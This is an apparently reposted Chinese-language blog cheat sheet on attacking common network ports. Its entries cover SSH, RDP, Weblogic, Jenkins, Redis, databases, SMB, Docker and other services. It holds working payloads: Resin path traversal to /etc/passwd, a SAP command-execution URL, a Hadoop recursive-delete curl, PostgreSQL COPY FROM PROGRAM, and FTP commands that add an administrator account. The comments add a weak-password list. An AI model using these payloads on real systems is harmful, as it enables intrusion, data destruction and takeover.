常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄

常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄

常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄


資料來源: https://mp.weixin.qq.com/s?__biz=MzIyMDEzMTA2MQ==&mid=2651152240&idx=2&sn=e1b8a38c01fad8f8eff13f2cec336495&chksm=8c2144eabb56cdfcd5dee4f42cf10a0c211809e0690002700eb9a353a292e2302ed741aa79fb&scene=126&sessionid=1595899253&key=7674ee21d747fecfee13314359d8dcaf941b76129d8b14810c9931aee608651749897386282787e8e14ed7129fb963a6380650d9d026eff44decb6f81991930167f9d59ab0490ccc3440035a55ce7c1b&ascene=1&uin=MjIwODk2NDgxNw%3D%3D&devicetype=Windows+10+x64&version=62090529&lang=zh_TW&exportkey=AtbU4kZzI3ZKKWMU45%2Bev4s%3D&pass_ticket=JJEmjBpPvJCtmH9Wn54FpB%2BhYrxSxNTlT3OneYBMt3NEAMfnleETJFjmG943cHJ5


1、遠程管理埠
    22 埠(SSH)
        安全攻擊:弱口令、暴力猜解、用戶名枚舉
        利用方式:
        1、通過用戶名枚舉可以判斷某個用戶名是否存在於目標主機中,
        2、利用弱口令/暴力破解,獲取目標主機許可權。

    23 埠(Telnet)
        安全性漏洞:弱口令、明文傳輸
        利用方式:
        1、通過弱口令或暴力破解,獲取目標主機許可權。
        2、嗅探抓取telnet明文帳戶密碼。
        
    3389 埠(RDP)
        安全性漏洞:暴力破解
        利用方式:通過弱口令或暴力破解,獲取目標主機許可權。

    5632 埠(Pcanywhere)
        安全性漏洞:弱口令、暴力破解
        利用方式:通過弱口令或暴力破解,獲取目標主機許可權

    5900 埠(VNC)
        安全性漏洞:弱口令、暴力破解
        利用方式:通過弱口令或暴力破解,獲取目標主機許可權。
        

2、Web中間件/服務埠
    1090/1099 埠(RMI)
        安全性漏洞:JAVA RMI 反序列化遠端命令執行漏洞
        利用方式:使用nmap檢測埠資訊。
        埠資訊:1099/1090    Java-rmi    Java RMI Registry
        檢測工具:attackRMI.jar

    7001 埠(Weblogic)
        安全性漏洞:弱口令、SSRF、反序列化漏洞
        利用方式:
        1、控制台弱口令上傳war木馬
        2、SSRF內網探測
        3、反序列化遠端代碼執行等
        
    8000 埠(jdwp)
        安全性漏洞:JDWP 遠端命令執行漏洞
        埠資訊:
              8000             jdwp           java Debug Wire Protocol
        檢測工具:https://github.com/IOActive/jdwp-shellifier
        
        
    8080 埠(Tomcat)
        安全性漏洞:弱口令、示例目錄
        利用方式:通過弱口令登錄控制台,上傳war包。

    8080 埠(Jboss)
        安全性漏洞:未授權訪問、反序列化。
        利用方式:
        1、未授權存取控制台,遠端部署木馬
        2、反序列化導致遠端命令執行等。
        檢測工具:https://github.com/joaomatosf/jexboss

    8080 埠(Resin)
        安全性漏洞:目錄遍歷、遠端檔讀取
        利用方式:通過目錄遍歷/遠端檔讀取獲取敏感資訊,為進一步攻擊提供必要的資訊。

        任意文件讀取POC:
        payload1 = “/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd”
        payload2 = “/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd”
        payload3 = “/ ..\\\\web-inf”

    8080 埠(Jetty)
        安全性漏洞:遠程共用緩衝區洩漏
        利用方式:攻擊者可以通過精心構造headers值來觸發異常並偏移到共用緩衝區,其中包含了之前其他用戶提交的請求,伺服器會根據攻擊者的payload返回特定位置的資料。
        檢測工具:https://github.com/GDSSecurity/Jetleak-Testing-Script

    8080 埠(GlassFish)
        安全性漏洞:弱口令、任意檔讀取
        利用方式:
        1、弱口令admin/admin,直接部署shell
        2、任意檔讀取獲取伺服器敏感配置資訊
        
    8080 埠(Jenkins)
        安全性漏洞:未授權訪問 、遠端代碼執行
        利用方式:訪問如下url,可以執行指令碼命令,反彈shell,寫入webshell等。
        http://<target>:8080/manage
        http://<target>:8080/script

    8161 埠(ActiveMQ)
        安全性漏洞:弱口令、任意檔寫入、反序列化
        利用方式:預設密碼admin/admin登陸控制台、寫入webshell、上傳ssh key等方式。

    9043 埠(webSphere)
        安全性漏洞:控制台弱口令、遠端代碼執行
        後臺地址:https://:9043/ibm/console/logon.jsp

    50000 埠(SAP)
        安全性漏洞:遠端代碼執行
        利用方式:攻擊者通過構造url請求,實現遠端代碼執行。
        POC:http://<target>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all

    50070 埠(hadoop)
        安全性漏洞:未授權訪問
        利用方式:攻擊者可以通過命令列操作多個目錄下的資料,如進行刪除操作。
        curl -i -X DELETE “http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true“
        curl -i -X PUT “http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS“


3、數據庫埠
    389 埠(ldap)
        安全性漏洞:未授權訪問 、弱口令
        利用方式:通過LdapBrowser工具直接連入。

    1433 埠(Mssql)
        安全性漏洞:弱口令、暴力破解
        利用方式:差異備份getshell、SA帳戶提權等

    1521 埠(Oracle)
        安全性漏洞:弱口令、暴力破解
        利用方式:通過弱口令/暴力破解進行入侵。

    3306 埠(MySQL)
        安全性漏洞:弱口令、暴力破解
        利用方式:利用日誌寫入webshell、udf提權、mof提權等。

    5432 埠( PostgreSQL)
        安全性漏洞:弱口令、高許可權命令執行
        利用方式:攻擊者通過弱口令獲取帳號資訊,連入postgres中,可執行系統命令。。
        PoC參考:
            DROP TABLE IF EXISTS cmd_exec;
            CREATE TABLE cmd_exec(cmd_output text);
            COPY cmd_exec FROM PROGRAM ‘id’;
            SELECT * FROM cmd_exec;
        
    5984 埠(CouchDB)
        安全性漏洞:垂直許可權繞過、任意命令執行
        利用方式:通過構造資料創建管理員使用者,使用管理員用戶登錄,構造惡意請求觸發任意命令執行。
        後臺訪問:http://<target>:5984/_utils

    6379 埠(Redis)
        安全性漏洞:未授權訪問
        利用方式:絕對路徑寫webshell 、利用計畫任務執行命令反彈shell、
        公私密金鑰認證獲取root許可權、主從複製RCE等。

    9200 埠(elasticsearch)
        安全性漏洞:未授權訪問、命令執行
        檢測方式:
        1、直接訪問如下url,獲取相關敏感資訊。
          http://<target>:9200/_nodes  查看節點資料
          http://<target>:9200/_river  查看資料庫敏感資訊
        2、通過構造特定的資料包,執行任意命令。

    11211 埠(MemCache)
        安全性漏洞:未授權訪問
        檢測方式:無需用戶名密碼,可以直接連接memcache 服務的11211埠。
        nc -vv <target> 11211

    27017 埠(Mongodb)
        安全性漏洞:未授權訪問、弱口令
        利用方式:未授權訪問/弱口令,遠端連入資料庫,導致敏感資訊洩露。


4、常見協議埠

    21 埠(FTP)
        安全性漏洞:1、配置不當    2、明文傳輸    3、協力廠商軟體提權
        利用方式:
        1、匿名登入或弱口令
        2、嗅探ftp用戶名和密碼
        3、Serv-U許可權較大的帳號可導致系統命令執行。FTP提權命令:
          # 增加系統使用者
           Quote site exec net user 4567 4567 /add
          # 提升到管理員許可權
           Quote site exec net localgroup administrators 4567 /add

    25 埠(SMTP)
        攻擊方式:1、匿名張貼郵件 2、弱口令 3、SMTP用戶枚舉
        利用方式:
        1、SMTP伺服器配置不當,攻擊者可以使用任意用戶發送郵件。
        2、SMTP弱口令掃描,獲取使用者帳號密碼,發送郵件釣魚。
        3、通過SMTP用戶枚舉獲取用戶名:
           nmap -p 25 — smtp-enum-users.nse <target>

    53 埠(DNS)
        安全攻擊:1、DNS域傳送漏洞、DNS欺騙、DNS緩存投毒
        檢測方式:
        1、DNS域傳送漏洞,Windows下檢測使用nslookup命令,Linux下檢測使用dig命令,通過執行命令可以清楚的看到功能變數名稱解析情況。
        2、DNS欺騙就是攻擊者冒充功能變數名稱伺服器的一種欺騙行為。
        3、DNS緩存投毒是攻擊者欺騙DNS伺服器相信偽造的DNS回應的真實性。

    161 埠(SNMP)
        安全性漏洞:默認團體名/弱口令訪問
        利用方式:通過nmap自帶的審計腳本進行檢測,可能導致敏感資訊洩露。。
        1、弱口令檢測:nmap –sU –p161 –script=snmp-brute <target>
        2、獲取系統資訊:nmap –sU –p161 –script=snmp-sysdescr <target>
        3、獲取使用者資訊:nmap -sU -p161 –script=snmp-win32-user <target>
        4、獲取網路埠狀態:nmap -sU -p161 –script=snmp-netstat <target>

    443 埠(SSL)
        安全性漏洞:OpenSSL 心臟出血
        利用方式:攻擊者可以遠端讀取存在漏洞版本的openssl伺服器記憶體中長大64K的資料。
        掃描腳本:nmap -sV –script=ssl-heartbleed <target>

    445 埠(SMB)
        安全性漏洞:資訊洩露、遠端代碼執行
        利用方式:可利用共用獲取敏感資訊、緩衝區溢位導致遠端代碼執行,如ms17010。

    873 埠(Rsync)
        安全性漏洞:匿名訪問、弱口令
        利用方式:攻擊者可以執行下載/上傳等操作,也可以嘗試上傳webshell。
        1、下載:#rsync -avz a.b.c.d::path/file path/filiname  
        2、上傳:#rsync -avz path/filename a.b.c.d::path/file

    2181 埠(Zookeeper)
        安全性漏洞:未授權訪問
        檢測方式:攻擊者可通過執行envi命令獲得系統大量的敏感資訊,包括系統名稱、Java環境。
         echo envi | nc ip port

    2375 埠(Docker)
        安全性漏洞:未授權方式
        檢測方式:通過docker daemon api 執行docker命令。
        #列出容器資訊,效果與docker ps -a 一致。
         curl http://<target>:2375/containers/json
         docker -H tcp://<target>:2375 start <Container Id>

2 thoughts on “常見網路埠(PORT)滲透(駭入) 黑客/駭客筆錄

  1. https://mp.weixin.qq.com/s?__biz=MzIxNjA5MTM2MA==&mid=2652439054&idx=2&sn=4714adbd1992db89a0d4a5f270e1da07&chksm=8c63fd81bb147497f507461ffcad3c3fabb8c697ec2cd0db74773383086cfc2ff6487bcc0223&scene=126&sessionid=1597974761&key=bf49e72a192178bf7c302f88ca04a3d726430fd89050195e565e8a785e7ef1739a4b2acc8efdd93813bf638cfd487387693f99a0c35d329ba0d175b6dd3a1a6ade1e9386aa06a4b48c973baf8e426093a23d876c428a342b92d6d72b9cd346770c4b6d158bc535c1fd1de46cc9c0206a043872d9535630c7ae668b30e03f0f66&ascene=1&uin=MjIwODk2NDgxNw%3D%3D&devicetype=Windows+10+x64&version=62090529&lang=zh_TW&exportkey=Ao8rFuK48Yc74vY%2FRhRJaps%3D&pass_ticket=ofsaBGmNz2arvIpXOhPN7mDM0kwKpPFQH3U9x9MGwb5U6IS0xkM%2Bh5xZFKCB15V7

    1 tcpmux
    7 echo
    9 discard
    11 systat
    13 daytime
    15 netstat
    17 qotd
    19 chargen
    20 ftp data
    21 ftp access
    22 ssh
    23 telnet
    25 smtp
    37 time
    42 name
    43 nicname
    53 domain
    77 priv-rjs
    79 finger
    87 ttylink
    95 supdup
    101 hostriame
    102 iso-tsap
    103 gppitnp
    104 acr-nema
    109 pop2
    110 pop3
    111 sunrpc
    113 auth
    115 sftp
    117 uucp-path
    119 nntp
    123 NTP
    135 loc-srv /epmap
    139 netbios
    143 imap2
    179 BGP
    389 ldap
    465 smtp+ssl
    512 print / exec
    513 login
    514 shell
    515 printer
    526 tempo
    530 courier
    531 chat
    532 netnews
    540 uucp
    556 remotefs
    563 nntp+ssl
    587 stmp?
    601 ??
    636 ldap+ssl
    993 ldap+ssl
    995 pop3+ssl
    2049 nfs
    3659 apple-sasl / PasswordServer
    4045 lockd
    6000 X11
    6665 Alternate IRC [Apple addition]
    6666 Alternate IRC [Apple addition]
    6667 Standard IRC [Apple addition]
    6668 Alternate IRC [Apple addition]
    6669 Alternate IRC [Apple addition]

  2. 這15組「超常見密碼」易遭駭客破解 資安專家:快改掉[駭客/黑客 暴力破解 預先 測試]

    https://www.msn.com/zh-tw/news/world/%E9%80%9915%E7%B5%84-%E8%B6%85%E5%B8%B8%E8%A6%8B%E5%AF%86%E7%A2%BC-%E6%98%93%E9%81%AD%E9%A7%AD%E5%AE%A2%E7%A0%B4%E8%A7%A3-%E8%B3%87%E5%AE%89%E5%B0%88%E5%AE%B6-%E5%BF%AB%E6%94%B9%E6%8E%89/ar-BB1hi5hX

    據悉,懷斯列出的15組高危險性密碼包括「123456」、「123456789」、「admin」、「Qwerty」、「welcome」、「Password」、「Password1」、「p@ssw0rd」、「12345」、「Qwerty123」、「1q2w3e」、「12345678」、「111111」、「1234567890」和「Q2w3e4r5t」。

發表迴響

你的電子郵件位址並不會被公開。 必要欄位標記為 *